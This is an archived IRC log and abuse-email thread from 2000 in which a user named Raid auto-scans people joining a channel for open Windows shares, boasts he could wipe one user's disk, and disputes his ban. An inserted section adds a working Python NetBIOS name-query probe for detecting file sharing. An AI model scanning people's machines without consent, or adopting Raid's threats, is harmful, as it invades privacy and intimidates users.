*** dreamweb has quit IRC (Ping timeout for dreamweb[213.108.36.228])
<CiCi> Raid you may only be a teenager, but you've no involved yourself in a problem with the authorities
<CiCi> I'll let them handle it, but a word of advice would be to judge who you threaten more carefully
<Raid> CiCi: Listen, I'm not a teenager.. and I don't think the authorities are going to do anything about me.
<Raid> CiCi: But if you know something I don't, I;d like to know about it.
<CiCi> Raid when you threaten to do damage to someone's computer system, and you dare them to take legal action, rest assured, they WILL do that
<CiCi> and don't act like you have no clue what's going on here
<CiCi> that's the end of my discussion with you, you can talk to an attorney
*** CiCi ([email protected]) has left #Christian
<pSyk_> wow
*** RoadRunnr ([email protected]) has joined #Christian
<Raid> uh huh
<pSyk_> ud' think god came down and shoved a red hot poker up his bummhole
*** MarySue ([email protected]) has joined #Christian
<Raid> I didn't threaten him, He had a real open share on his box.
*** logos3 sets mode: +o RoadRunnr
<Raid> thats HIS fault, jerk

<pataway> allrighty pSyk_
*** dreamweb1 ([email protected]) has joined #Christian
<pataway> i think u should leave
<`Pegasus> hi Road!
<RoadRunnr> hi..
-> *dan_* what the fuck is with cici?
*** pSyk_ was kicked by RoadRunnr (pSyk_)
<pataway> hi roady
*** pSyk_ ([email protected]) has joined #Christian
*** RoadRunnr sets mode: +b *!*@endless.efortress.com
*** pSyk_ was kicked by logos3 (Banned)
<dan_> *s*
<`Pegasus> thanks rr!
*** Karentra ([email protected]) has joined #Christian
<pataway> ta roady
*** Karentra ([email protected]) has left #Christian
*** RoadRunnr sets mode: -o RoadRunnr
<pataway> i would ahve done the honors myself but logos well.... yah
<RoadRunnr> what a way to start the day..
<Raid> I don't beleive this BS...
<pataway> hi MarySue !!!!
* pataway willl BBL
<Raid> I tell somebody they have a security problem, and I'm reported to the authorities?
<MarySue> patience : ))
<pataway> Raid i think she referred to what you said to LC when you were here earlier
-> *cici* You want my logs of christian ? I didn't threaten your friend chap. I told him he has an open share and he's vulnerable, I did nothing to his computer.
<RoadRunnr> eh?
<Raid> pataway: HE has an open acccess to his computer, Ok?
<pataway> anywho
<pataway> she = CiCi
<Raid> pataway: With that, anybody can access his hard disk.
<`Pegasus> what?
<RoadRunnr> Raid, are you saying what i think you are saying?
*** MarySue is now known as MarySafk
<ZoOrOpA> DAN!!!!!!!!!
<RoadRunnr> we don't tolerate threats in here
<Raid> RoadRunnr: grrrr.
<Melv\Mike> MarySafk
<Raid> RoadRunnr: damnit dude, listen to me. I warned chap he had an open share; I didn't DO ANYTHING TO HIM.
<ZoOrOpA> dan_?
<Melv\Mike> RoadRunnr: Oh yeah? what are you going to do about it?
<`Pegasus> Are you guys saying he can access my HD?
<RoadRunnr> okay, lets move on then :)
<Raid> `Pegasus: If you had an open share, anybody could.
<pataway> i dunno what an open share is lol
<`Pegasus> Raid: what port does that use?
*** Pipetobak ([email protected]) has joined #Christian
<Pipetobak> Yo!
<Pipetobak> !rsv lev 16 13
<`Pegasus> hi
<logos3> Pipetobak: Lev 16:13 "13 and put the incense on the fire before the LORD, that the cloud of the incense may cover the mercy seat which is upon the testimony, lest he {die;}" (RSV)
* Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with relish as he glances about looking for interesting conversation.
<Pipetobak> Peg!
<`Pegasus> hi pipe
<RoadRunnr> hiya Pipetobak
<Pipetobak> Roadrunner!
<RoadRunnr> Raid, how have you been anyhow?
[`Pegasus:#Christian PING]
*** ZoOrOpA ([email protected]) has left #Christian
<`Pegasus> anyone?
<Nuts> huh?
<`Pegasus> ok :)
<`Pegasus> I tought I was alone
<Nuts> you're with a nut
<RoadRunnr> lol
<RoadRunnr> and a RR
<RoadRunnr> but i am not staying
<Nuts> hehe
*** i8dog ([email protected]) has joined #Christian
<`Pegasus> lol
<Raid> RoadRunnr: Pretty good, But I'm losing my opinion of the undernet ircops intelligence.
<i8dog> hello good people of CHRIST.
<`Pegasus> uh oh
<Raid> no offense dan ;p
<`Pegasus> i8dog?
<i8dog> hello

<RoadRunnr> is dan awake ?
<`Pegasus> whats wrong?
<`Pegasus> I see
<RoadRunnr> hmm?
<RoadRunnr> whats wrong?
<`Pegasus> Raid: Thats not very nice to say
*** MarySafk is now known as MarySue
* i8dog opens the bible and starts reading.
*** Kozubchik ([email protected]) has joined #Christian
<RoadRunnr> lets move on from that, okay
<`Pegasus> wb marysue
<RoadRunnr> hiya MarySue, i8dog and Kozubchik
<i8dog> hello roadrunnr.
<Kozubchik> Hey Road
* i8dog reads fevershly looking for answers.
<MarySue> *Hugs* RoadRunnr
* RoadRunnr ain't staying.. am on the expensive isp
<`Pegasus> You know what guys, this place is getting too weird today. I think Im gonna come back later.
<RoadRunnr> just sending some mail
<`Pegasus> God Bless you all
<RoadRunnr> bye pegasus !
<`Pegasus> bye bye RR
*** `Pegasus ([email protected]) has left #Christian
*** atman` ([email protected]) has joined #Christian
<i8dog> take care peg... don't let the yellow dots make your head purple.
<atman`> anyone ever hear from Petrus, who used to hang out here?
<MarySue> atman` !!!!!!!!!!
<RoadRunnr> yeah, he still pops in
* RoadRunnr double blinks.. atman?!
<RoadRunnr> *logos3* petrus was last on IRC channel #christian 2 days, 18 hours, 11 minutes ago.
* JnetyBabe wakes up
<atman`> hi RR
<i8dog> raid rules.
<MarySue> atman` he's here every now and then
<atman`> ah, ok, just was thinking about him :) Thanks!
<Kozubchik> Pray unto God for Thumps and his Loved Ones, O holy God Pleaser St Michael the Archangel, for we all need to fervently flee unto thee, the speedy helper and intercessor for our souls.
<JnetyBabe> later all...
*** JnetyBabe ([email protected]) has left #Christian

<MarySue> atman` I think Colin^ talked with him a couple of days ago : )
<atman`> thanks Marysue & RR
<atman`> :)
<MarySue> <---- is abbigail, remember me, atman`???
*** atman` ([email protected]) has left #Christian
<MarySue> guess he does ... lol
<MarySue> ; )
<RoadRunnr> lol.. wierd
End of #Christian buffer Fri Sep 08 16:14:38 2000

The next day, I begin to talk to her.. Here's that log. :) I dub this, "The undernet funny"

Session Start: Fri Sep 08 23:01:35 2000
Session Ident: CiCi ([email protected])
> /whois cici
CiCi is [email protected] * God Can!
CiCi on #christian
CiCi using dallas.tx.us.undernet.org www.airmail.net
CiCi is an IRC Operator
cici End of /WHOIS list.

<CiCi> why?
<Raid> I don't think you quiet understand what you erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
<Raid> I told him if I was a jerk as he said, I would have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody; even you.
<CiCi> ok, let me go read these logs again with that in mind, brb
<Raid> So when I'm contacted by the authorities, (they already know about this serious security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider that a threat, lamer.
<Raid> Are you going to use the entire log, or out of context?
<Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
<Raid> then anybody (even you) could access his entire system.
<Raid> and use it like you were sitting at the keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no idea you didn't know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you manually set it otherwise, drive c: is shared as open, with admin rights, no password.
<Raid> listen, if you really don't believe me, You can ask anybody you trust with computer knowledge to checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and if they don't check it out first.

<Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing, but you were threatening and that's not right
<Raid> He didn't believe me when I told him YOU were an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me when you first met me
<Raid> I had to /whois and show him your "is an ircop" thingie.
<Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that point. he was mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of context) that if I was a jerk, I could easily format /u his hard disk, or even quicker, nuke his fat or registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you. I'm perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like undernet does for open proxies.
<Raid> You might want to recommend undernet do this scan hehe
<Raid> it's even more serious to a users data then an open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about something, Check it out before accusing me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
<CiCi> the only things we look for are things that damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as yours done to all guests
<Raid> if they all knew about the bug in windows, I bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops i've talked too.
<Raid> I realize I may sound like a smartass; But it's seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said to him?
<CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off. I decided to tell him in open channel (I was writing /msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the problem, I don't now, but I do know that what you did was not good
<Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before his eyes, and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically something a kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the second they were told an open share was found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could take advantage?
<CiCi> would have been more civil if you hadn't tried to act l33t with him

<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back did he?
<Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise one... So I cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and most of us are mature enough not to have a temper fit and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is check ANY search engine (or even micrsoft) for the fix for this problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection or map anything.
<Raid> it's no more intrusive then proxy scans. Users don't even notice it, and it doesn't show up as an attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a chance.
<Raid> and goodnight n stuff.

From John Grahms Sat Sep 9 10:07:29 2000
Received: from [205.245.107.244] by web1610.mail.yahoo.com; Sat, 09 Sep 2000 10:07:29 PDT
Date: Sat, 9 Sep 2000 10:07:29 -0700 (PDT)
From: John Grahms <[email protected]>
Subject: Hello
To: [email protected]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 9146

Hi there. I thought you might like to know you have one stupid ircop on undernet. Not only is she stupid, but it's impossible to explain anything to her.

Her name is CiCi, and I just got klined for "hacking". Full log follows. If you could deal with this for me, I'd appreciate it.

Banned *@kpt-c-205-245-107-244.chartertn.net[1] until Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is not a playground for you to port scan and invade other's machines.

Here's my kline (I went out to get some food, she klined me when I left). Here's the log of all channel activity up to my kline.

[12:25] *** Now talking in #CHristian
[12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[12:25] <Raid> mornin
[12:26] *** LC ([email protected]) has joined #CHristian
[12:26] *** Txico ([email protected]) Quit (Ping timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
[12:26] <CiCi> ok everyone, when Raid's in the channel, all your machines are going to be scanned so be prepared
[12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes
[12:27] <Raid> CiCi: Actually, I've turned the script off.
[12:28] <Raid> CiCi: I didn't want to risk having to explain what netbios open shares are again. ;p

And here's the wonderful log last night of us chatting. This is a long read, but it seriously shows little intelligence on her part. Where did you get this lady?


Please deal with her, I don't like being klined for bullshit. Thank you kindly.

From L. Maurer Sat Sep 9 10:51:29 2000
X-Apparently-To: [email protected] via web1609.mail.yahoo.com
Received: from mail.airmail.net (206.66.12.40) by mta223.mail.yahoo.com with SMTP; 09 Sep 2000 12:54:17 -0700 (PDT)
Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <[email protected]> sender: <[email protected]> id <mT/[email protected]>; Sat, 9 Sep 2000 12:49:17 -0500 (CDT)
Message-Id: <3.0.32.20000909125128.0283b380@mail.iadfw.net>
X-Sender: [email protected]
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sat, 09 Sep 2000 12:51:29 -0500
To: John Grahms <[email protected]>
From: "L. Maurer" <[email protected]>
Subject: Re: [Abuse] Hello
CC: [email protected]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Length: 10041


You were removed because you were actively scanning others' machines as they joined the channel, invading those machines when possible, and pasting their private chat logs back to them. You have been asked to stop doing this for over 24 hours and the requests were met with an attitude from you that you were very much entitled to invade and compromise machines when someone irritated you on Undernet. Don't think for one minute that this is either legal or appreciated using Undernet bandwidth. If this is repeated by you when your gline expires, expect another one.

Ci_Ci
Admin. Dallas.TX.US.Undernet.Org

At 10:07 AM 9/9/00 -0700, you wrote:
>Hi there. I thought you might like to know you have one stupid ircop on undernet. Not only is she stupid, but it's impossible to explain anything to her.
>
>Her name is CiCi, and I just got klined for "hacking". Full log follows. If you could deal with this for me, I'd appreciate it.
>
>Banned *@kpt-c-205-245-107-244.chartertn.net[1] until Sat Sep 09 05:57:09PM 2000 GMT [968522229]: this is not a playground for you to port scan and invade other's machines.
>
>Here's my kline (I went out to get some food, she klined me when I left). Here's the log of all channel activity up to my kline.
>[12:25] *** Now talking in #CHristian
>[12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info.
>[12:25] <Raid> mornin
>[12:26] *** LC ([email protected]) has joined #CHristian
>[12:26] *** Txico ([email protected]) Quit (Ping timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])
>[12:26] <CiCi> ok everyone, when Raid's in the channel, all your machines are going to be scanned so be prepared
>[12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes
>[12:27] <Raid> CiCi: Actually, I've turned the script off.
>[12:28] <Raid> CiCi: I didn't want to risk having to explain what netbios open shares are again. ;p
>
>And here's the wonderful log last night of us chatting. This is a long read, but it seriously shows little intelligence on her part. Where did you get this lady?
>
>
>Session Start: Fri Sep 08 23:01:35 2000
>Session Ident: CiCi ([email protected])
>
>/whois cici
>CiCi is [email protected] * God Can!
>CiCi on #christian
>CiCi using dallas.tx.us.undernet.org www.airmail.net
>CiCi is an IRC Operator
>cici End of /WHOIS list.
>
><CiCi> why?
><Raid> I don't think you quite understand what you erm, reported me for. heh
><Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
><Raid> I told him if I was a jerk as he said, I would have formatted him.
><Raid> I didn't do so. hehe
><Raid> I didn't "hack" him or anything.
><Raid> His computer isn't setup properly.
><Raid> His entire c: drive is wide open to anybody; even you.
><CiCi> ok, let me go read these logs again with that in mind, brb
><Raid> So when I'm contacted by the authorities, (they already know about this serious security problem..) they'll probably get a chuckle out of it. As I told chaplain he had this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
><Raid> thanks.
><CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider that a threat, lamer.
><Raid> Are you going to use the entire log, or out of context?
><Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
><Raid> then anybody (even you) could access his entire system.
><Raid> and use it like you were sitting at the keyboard.
><Raid> I thought he might like to know about it.
><Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet.
>I had no idea you didn't know about this serious problem with windows machines.
><Raid> NT suffers from it as well.
><Raid> in fact, everytime you reboot; unless you manually set it otherwise, drive c: is shared as open, with admin rights, no password.
><Raid> listen, if you really don't believe me, You can ask anybody you trust with computer knowledge to checkout this log of our chat.


><Raid> I'm not bsing you.
><Raid> I was trying to save you some shame is all.
><Raid> (My boss thought it was funny as hell.)
><CiCi> you were trying to save me from shame?
><CiCi> heh
><Raid> erm, embarrassment rather
><Raid> it's not normal for an admin to not understand shared drives. ;p
><Raid> and you are an administrator. hehe
><CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
><Raid> Admins are supposed to know these things, and if they don't check it out first.
><Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
><CiCi> if you were trying to help, that's one thing, but you were threatening and that's not right
><Raid> He didn't believe me when I told him YOU were an ircop of undernet.
><CiCi> if you recall, you tried that same mess on me when you first met me
><Raid> I had to /whois and show him your "is an ircop" thingie.
><Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that point. he was mine for the kill if I wanted it.
><Raid> Instead, I told him he had a problem.
><Raid> and explained (which you did take out of context) that if I was a jerk, I could easily format /u his hard disk, or even quicker, nuke his FAT or registry.
><CiCi> why were you looking anyway?
><Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you. I'm perfectly capable of backing up what I say.
><Raid> I wasn't.
><Raid> My script autoscans people on joins, much like undernet does for open proxies.
><Raid> You might want to recommend undernet do this scan hehe
><Raid> it's even more serious to a user's data than an open proxy.
><CiCi> uhm no
><CiCi> undernet isn't a nanny service
><Raid> Shrug, as I said... if you don't know about something, check it out before accusing me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
><CiCi> the only things we look for are things that damage this network on a large scale
><CiCi> the admins would NEVER agree to such scans as yours done to all guests
><Raid> if they all knew about the bug in windows, I bet you they would.
><CiCi> now, I'm tired of you insulting me
><Raid> I'm sure some of you ircops login with windows boxes.
><Raid> I'm not trying to insult you.
><Raid> Actually I find you one of the cooler ircops I've talked to.
><Raid> I realize I may sound like a smartass; But it's seriously not intentional.
><Raid> I simply want to resolve this issue with you.


><Raid> I'm not worried about the authorities.
><Raid> I just don't like people thinking I've done something I didn't is all.
><CiCi> you scanned someone's machine and then said
><CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
><Raid> My script scanned him when he joined.
><CiCi> I haven't changed my opinion of your immature behavior
><Raid> hmmm
><CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
><Raid> Did you get the entire log, or just what I said to him?
><CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
><Raid> IE: the first thing he said to me?
><CiCi> a lot of them, but I don't
><Raid> I was minding my own business, he smarted off. I decided to tell him in open channel (I was writing /msg to him) that he had a problem.
><CiCi> perhaps a lack of communication skills is the problem, I don't know, but I do know that what you did was not good
><Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before his eyes, and said nothing.
><CiCi> *shrug*
><CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically something a kid does
><Raid> a kid?
><Raid> No ma'am, A kid would have formatted him the second they were told an open share was found.
><Raid> or stolen data or something.
><Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
><CiCi> pftt
><CiCi> that was very nice of you...... not
><CiCi> and that's my point
><Raid> would it have been nicer not to tell him?
><Raid> so somebody WITH the intention of harm could take advantage?
><CiCi> would have been more civil if you hadn't tried to act l33t with him
><Raid> I didn't try to act l33t.
><CiCi> and because you decided to show off and make a fool of someone, you made a mess
><Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
><Raid> Chaplain I bet didn't mention we go way back did he?
><Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise one... So I cancelled it, and wrote a new one.
><CiCi> a lot of people can hack, most of us don't, and most of us are mature enough not to have a temper fit and announce a problem
><CiCi> enough
><Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is check ANY search engine (or even microsoft) for the fix for this problem.


><Raid> they'll even tell you it's not a hack.
><Raid> it's a bug.
><CiCi> most invasions are bugs
><Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection or map anything.
><Raid> it's no more intrusive than proxy scans. Users don't even notice it, and it doesn't show up as an attack on any firewalls either; because it isn't.
><CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
><Raid> ugh... Well, checkout what I said if you get a chance.
><Raid> and goodnight n stuff.
>
>Please deal with her, I don't like being klined for bullshit. Thank you kindly.
>
>
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>

From John Grahms Sat Sep 9 16:06:45 2000
Received: from [205.245.105.248] by web1610.mail.yahoo.com; Sat, 09 Sep 2000 16:06:45 PDT
Date: Sat, 9 Sep 2000 16:06:45 -0700 (PDT)
From: John Grahms <[email protected]>
Subject: Re: [Abuse] Hello
To: Gator <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 1641


--- Gator <[email protected]> wrote:
> File shares were not a big problem in the past when users were mostly on modems. Windows would warn you if you enabled file sharing on your modem. However, today in the world of cable and dsl, these devices usually use network cards, the same is not true. Windows not only does not warn you if you enable file shares on your network card device(s), but with the default bindings and filesharing installed you are vulnerable. Your drives are open to the public and there are quite a few virii and trojans that actually exploit this to spread.
>
> So in short the man is right about it being a problem. I have no idea what he did with that information however.

I told the user he had a problem, and suggested he get Zone Alarm firewall; I've got those logs too if you should need them. I did NOT at any time access his machine, nor map any drives to mine. I was informed he was vulnerable; I told him.

I tried to explain this to CiCi, but she clearly couldn't understand such a simple concept of telling somebody they have a real serious problem.

I did NOT attack Mr Chaplain's computer at any time, and she didn't gline me last night. She glined me today; She had plenty of time to gline last night. Regardless, her gline wasn't valid. I did not use the information that my script told me about for anything bad, And I'd appreciate it if you could explain this to her, so I don't have to deal with this BS.
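Gator's point in the message above (file and print sharing bound to a network card with the default bindings leaves the box advertising its shares to the whole network) and Raid's own description of what his script did (one NetBIOS lookup against the joining host, no connection to the shares themselves; later in the thread he says it sent a single net view against port 139) both come down to one question: is the host running the Server service at all? The script below is an added example, not Raid's script and not from the Coderz e-zine. It sends the same RFC 1002 node-status (NBSTAT) request that nbtstat -A <ip> sends, one UDP datagram to port 137, and parses the name table in the reply; a unique name registered with suffix <20> means the Server service is up and the machine is offering file and print shares. The reply it parses is constructed, not captured; the host name TESTBOX, the workgroup and the MAC address are made up, and the function names are mine. A <20> name only says the service is registered; it does not tell you whether any share is readable without a password, which is the situation the thread is arguing about.

```python
"""NBSTAT (RFC 1002 node-status) query builder and reply parser: the request `nbtstat -A <ip>`
sends (one UDP datagram to port 137). Added example, not Raid's script and not from the e-zine."""
import socket
import struct

NBNS_PORT = 137
NBSTAT_TYPE = 0x0021        # node status request/response RR type
CLASS_IN = 0x0001
NAME_ENTRY_LEN = 18         # 15-byte name + 1-byte suffix + 2-byte flags
GROUP_FLAG = 0x8000         # set on group names (workgroup/domain)
SUFFIX_WORKSTATION = 0x00   # the <00> hex seen in nbtstat output
SUFFIX_SERVER = 0x20        # <20>: Server service, i.e. file/print sharing is up
WILDCARD_NAME = b"*" + b"\x00" * 15   # "*" asks for the responder's whole name table


def encode_name(raw16: bytes) -> bytes:
    """RFC 1001 first-level encoding: each byte becomes 'A'+hi nibble, 'A'+lo nibble."""
    if len(raw16) != 16:
        raise ValueError("NetBIOS names are exactly 16 bytes (15 chars + suffix)")
    out = bytearray([32])                # label length: 32 encoded characters
    for b in raw16:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    out.append(0)                        # root label terminator
    return bytes(out)


def skip_name(data: bytes, off: int) -> int:
    """Return the offset just past a DNS-style label sequence starting at off."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0:                # compression pointer: 2 bytes, ends the name
            return off + 2
        off += 1 + length


def build_nbstat_query(txid: int = 0x1234) -> bytes:
    """12-byte header, 34-byte wildcard question name, type NBSTAT, class IN (50 bytes)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(WILDCARD_NAME) + struct.pack(">HH", NBSTAT_TYPE, CLASS_IN)


def parse_nbstat_response(data: bytes):
    """Return (names, mac); names is a list of (name, suffix, is_group) tuples."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not an NBSTAT response")
    off = 12
    for _ in range(qd):                  # replies normally carry no question section
        off = skip_name(data, off) + 4
    off = skip_name(data, off)
    rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT_TYPE or rclass != CLASS_IN:
        raise ValueError("unexpected RR type/class")
    rdata = data[off:off + rdlen]
    names, pos = [], 1
    for _ in range(rdata[0]):            # NUM_NAMES
        entry = rdata[pos:pos + NAME_ENTRY_LEN]
        if len(entry) < NAME_ENTRY_LEN:
            raise ValueError("truncated name entry")
        name = entry[:15].rstrip(b" ").decode("latin-1")
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append((name, entry[15], bool(nflags & GROUP_FLAG)))
        pos += NAME_ENTRY_LEN
    return names, rdata[pos:pos + 6]     # UNIT_ID (MAC address) follows the table


def assess(names):
    """What the name table says: host name and whether the Server service is registered."""
    unique = {suffix for _, suffix, group in names if not group}
    host = next((n for n, s, g in names if not g and s == SUFFIX_WORKSTATION), None)
    return {"host": host, "file_sharing": SUFFIX_SERVER in unique}


def sample_response(txid: int = 0x1234) -> bytes:
    """Constructed reply (not a capture): host TESTBOX in WORKGROUP with the Server service up."""
    def entry(name: bytes, suffix: int, flags: int) -> bytes:
        return name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)
    table = (entry(b"TESTBOX", SUFFIX_WORKSTATION, 0x0400)      # unique, active
             + entry(b"WORKGROUP", SUFFIX_WORKSTATION, 0x8400)  # group, active
             + entry(b"TESTBOX", SUFFIX_SERVER, 0x0400))        # <20>: shares offered
    rdata = bytes([3]) + table + bytes.fromhex("00a0c9112233") + b"\x00" * 46
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response, authoritative
    rr = encode_name(WILDCARD_NAME) + struct.pack(">HHIH", NBSTAT_TYPE, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def query_host(ip: str, timeout: float = 2.0):
    """Send one NBSTAT query on the wire (needs UDP/137 reachable) and assess the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_nbstat_query(), (ip, NBNS_PORT))
        data, _ = s.recvfrom(2048)
    names, _mac = parse_nbstat_response(data)
    return assess(names)


if __name__ == "__main__":
    names, mac = parse_nbstat_response(sample_response())
    print(assess(names), mac.hex(":"))   # query_host("<ip>") runs it against a host you may test
```

Run with no arguments it parses the built-in sample and reports TESTBOX with file_sharing True. query_host() is the on-wire version; only point it at hosts you are allowed to probe. A host that has NetBIOS name resolution blocked at a firewall will time out here even if 139 or 445 is reachable, and conversely a <20> answer says nothing about whether a connection to the share would be accepted.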

From John Grahms Sat Sep 9 17:18:10 2000
Received: from [205.245.105.248] by web1604.mail.yahoo.com; Sat, 09 Sep 2000 17:18:10 PDT
Date: Sat, 9 Sep 2000 17:18:10 -0700 (PDT)
From: John Grahms <[email protected]>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <[email protected]>
CC: [email protected]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-160051528-968545090=:19289"
Content-Length: 111621


--- "L. Maurer" <[email protected]> wrote:
> You were removed because you were actively scanning others' machines as they joined the channel, invading those machines when possible, and pasting their private chat logs back to them.

Incorrect. And I have logs not only from me to prove this, but from others present during the convo. You're definitely in the wrong. I did not invade ANY machines, and I'd love to see your proof stating otherwise. I'm sure my boss would as well. Being as he was present during the initial conversation with Chaplain. Even he knew about the shared drives problem on windows machines. He did not believe me when I told him you were an Oper on undernet; I actually had to /whois you to show him it! My script didn't do anything harmful to anyone's machine. And I didn't do anything harmful with the information it told me either, I informed users they had a problem if it found one, and I suggested they obtain Zone Alarm firewall.

> You have been asked to stop doing this for over 24 hours and the requests were met

